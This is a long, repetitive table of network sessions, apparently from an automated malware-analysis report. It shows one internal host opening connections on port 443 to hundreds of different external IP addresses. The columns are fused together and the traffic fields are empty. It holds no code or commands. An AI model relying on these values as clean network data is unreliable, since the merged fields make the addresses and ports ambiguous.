                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11983192.168.2.1352314168.252.102.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11984192.168.2.1336788169.254.104.3443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11985192.168.2.134474678.215.168.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11986192.168.2.133870066.50.45.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11987192.168.2.13436281.41.53.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11988192.168.2.135855283.157.244.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11989192.168.2.133458638.46.136.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11990192.168.2.1344542190.108.187.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11991192.168.2.135862659.198.198.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11992192.168.2.133555860.67.242.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11993192.168.2.135097045.109.15.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11994192.168.2.1351830179.188.196.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11995192.168.2.1339908170.125.214.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11996192.168.2.135117820.229.28.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11997192.168.2.133314094.72.6.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11998192.168.2.134304257.188.66.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11999192.168.2.1339728181.245.228.54443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12000192.168.2.1344400155.60.236.26443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12001192.168.2.1352590181.219.230.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12002192.168.2.1338990176.146.129.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12003192.168.2.13538969.235.5.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12004192.168.2.135240680.19.210.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12005192.168.2.1333924220.63.16.142443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12006192.168.2.1337020159.231.48.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12007192.168.2.1337210175.177.98.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12008192.168.2.1345696132.156.41.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12009192.168.2.1356240205.175.200.72443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12010192.168.2.135303213.157.133.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12011192.168.2.1334376101.57.39.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12012192.168.2.13375181.153.28.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12013192.168.2.1358008168.4.53.90443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12014192.168.2.1356840162.173.191.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12015192.168.2.1356852114.218.31.228443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12016192.168.2.1348650177.112.225.176443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12017192.168.2.1353524160.111.58.119443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12018192.168.2.1355996180.96.194.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12019192.168.2.1337878202.72.230.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12020192.168.2.1355146171.138.178.124443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12021192.168.2.133994066.229.53.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12022192.168.2.1347332216.204.169.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12023192.168.2.1343262125.80.104.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12024192.168.2.133684438.228.232.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12025192.168.2.1339866120.17.5.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12026192.168.2.1352486140.247.117.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12027192.168.2.1338748105.61.34.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12028192.168.2.1336778167.104.72.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12029192.168.2.1351754202.94.222.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12030192.168.2.135781680.171.230.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12031192.168.2.1343752151.146.152.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12032192.168.2.1337716154.44.244.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12033192.168.2.135393867.160.95.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12034192.168.2.1350608126.46.114.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12035192.168.2.13353589.31.135.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12036192.168.2.1346328119.129.227.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12037192.168.2.135956879.225.158.20443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12038192.168.2.1356254133.85.19.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12039192.168.2.134700019.96.237.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12040192.168.2.134601877.237.226.29443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12041192.168.2.1347330209.206.78.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12042192.168.2.135695891.128.191.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12043192.168.2.1343136195.202.36.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12044192.168.2.134881257.193.201.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12045192.168.2.1353682164.82.151.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12046192.168.2.134642227.143.48.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12047192.168.2.1333844156.104.193.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12048192.168.2.1336626210.217.197.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12049192.168.2.1349534179.218.207.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12050192.168.2.1351174164.104.125.57443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12051192.168.2.134276871.23.32.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12052192.168.2.136064681.1.107.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12053192.168.2.1354394193.12.30.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12054192.168.2.133318288.119.225.201443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12055192.168.2.134087447.253.230.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12056192.168.2.135348634.20.139.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12057192.168.2.135025213.17.40.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12058192.168.2.1360992210.83.220.153443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12059192.168.2.1344486123.210.169.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12060192.168.2.1332942203.128.233.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12061192.168.2.133887243.19.66.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12062192.168.2.1349058126.232.18.121443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12063192.168.2.1353070110.68.118.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12064192.168.2.133910440.203.216.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12065192.168.2.1344598107.88.210.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12066192.168.2.1342674204.57.131.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12067192.168.2.1352338133.127.169.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12068192.168.2.1340976203.111.244.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12069192.168.2.133538074.153.98.153443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12070192.168.2.1349428220.62.158.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12071192.168.2.1359780153.5.100.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12072192.168.2.1340320200.172.105.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12073192.168.2.134775014.117.46.121443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12074192.168.2.133284040.235.101.46443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12075192.168.2.1335586169.214.119.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12076192.168.2.135864814.251.41.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12077192.168.2.135819083.113.247.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12078192.168.2.134875492.135.196.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12079192.168.2.1336612115.119.148.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12080192.168.2.1338720116.95.184.228443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12081192.168.2.134166212.55.169.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12082192.168.2.1337314223.66.219.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12083192.168.2.1345374163.161.4.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12084192.168.2.133777880.80.51.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12085192.168.2.1336548158.105.215.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12086192.168.2.135532095.178.95.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12087192.168.2.1356550130.150.229.71443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12088192.168.2.1348334145.235.244.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12089192.168.2.135695499.167.100.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12090192.168.2.135188057.57.191.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12091192.168.2.135520671.229.137.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12092192.168.2.1347712169.191.179.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12093192.168.2.1347468126.235.162.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12094192.168.2.1360770140.63.247.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12095192.168.2.134962679.252.188.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12096192.168.2.133627445.248.35.1443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12097192.168.2.1353800142.249.43.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12098192.168.2.1352916209.32.162.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12099192.168.2.133442647.90.209.49443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12100192.168.2.1347692116.49.4.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12101192.168.2.1356076189.248.244.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12102192.168.2.134464268.232.22.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12103192.168.2.134017820.183.44.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12104192.168.2.13552069.71.144.114443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12105192.168.2.1339670155.240.230.201443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12106192.168.2.134180631.94.27.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12107192.168.2.1343578162.130.217.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12108192.168.2.1353776183.30.178.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12109192.168.2.134363423.239.1.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12110192.168.2.1345644177.143.134.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12111192.168.2.133818043.58.60.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12112192.168.2.1333348222.4.132.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12113192.168.2.133386458.75.160.249443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12114192.168.2.13563248.77.126.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12115192.168.2.1342230196.128.80.72443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12116192.168.2.135729820.27.130.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12117192.168.2.134584254.46.0.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12118192.168.2.1341868223.227.222.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12119192.168.2.1353048150.171.91.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12120192.168.2.134224614.31.184.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12121192.168.2.133976812.57.129.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12122192.168.2.135284273.26.36.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12123192.168.2.1355588106.105.79.142443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12124192.168.2.135673459.208.52.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12125192.168.2.13548342.190.158.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12126192.168.2.1350566114.89.75.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12127192.168.2.133340090.69.14.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12128192.168.2.1334706206.96.60.100443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12129192.168.2.1353492146.140.148.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12130192.168.2.1350958105.3.3.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12131192.168.2.135071659.238.59.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12132192.168.2.13425282.160.108.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12133192.168.2.1332806181.81.150.249443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12134192.168.2.1348632175.141.194.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12135192.168.2.1358234135.251.60.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12136192.168.2.1349694219.83.30.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12137192.168.2.135471689.94.53.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12138192.168.2.1349060135.130.197.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12139192.168.2.135330234.100.117.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12140192.168.2.1346718166.11.149.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12141192.168.2.1337586166.167.145.11443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12142192.168.2.1338202147.64.143.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12143192.168.2.1353354209.41.90.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12144192.168.2.135755293.249.69.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12145192.168.2.1359198201.233.32.104443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12146192.168.2.1350064220.26.202.165443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12147192.168.2.133676880.195.96.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12148192.168.2.1359564117.196.166.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12149192.168.2.134905071.78.174.119443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12150192.168.2.1333310122.15.70.38443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12151192.168.2.13414465.68.215.104443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12152192.168.2.134467639.69.29.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12153192.168.2.1341240198.71.102.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12154192.168.2.133559212.16.14.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12155192.168.2.134814635.103.35.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12156192.168.2.1336570171.35.22.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12157192.168.2.1357348111.64.79.21443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12158192.168.2.134509835.131.204.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12159192.168.2.1336234188.85.183.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12160192.168.2.1334280145.54.184.228443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12161192.168.2.13572724.226.241.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12162192.168.2.1358734182.228.199.208443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12163192.168.2.133937836.146.135.158443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12164192.168.2.1353128212.34.94.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12165192.168.2.1337012221.133.76.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12166192.168.2.133561646.135.84.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12167192.168.2.134287052.243.133.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12168192.168.2.1359572138.229.241.32443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12169192.168.2.1358922136.194.149.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12170192.168.2.1338118195.34.9.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12171192.168.2.1338260161.207.168.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12172192.168.2.1360994190.175.101.131443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12173192.168.2.1341524125.167.87.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12174192.168.2.13553322.73.128.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12175192.168.2.134665068.47.174.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12176192.168.2.1339498188.228.159.32443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12177192.168.2.1334192118.126.242.55443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12178192.168.2.135693269.250.151.7443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12179192.168.2.1356668189.194.104.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12180192.168.2.1352954188.45.169.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12181192.168.2.1339722186.163.123.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12182192.168.2.1360654198.22.210.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12183192.168.2.1345634184.127.54.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12184192.168.2.1342114222.159.122.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12185192.168.2.135327418.15.81.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12186192.168.2.1349136124.208.97.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12187192.168.2.133492617.36.115.189443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12188192.168.2.1357804218.198.7.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12189192.168.2.135225417.137.193.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12190192.168.2.1336178174.140.103.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12191192.168.2.1346732113.114.158.57443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12192192.168.2.1350288106.247.157.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12193192.168.2.133351664.213.137.203443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12194192.168.2.135217220.22.1.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
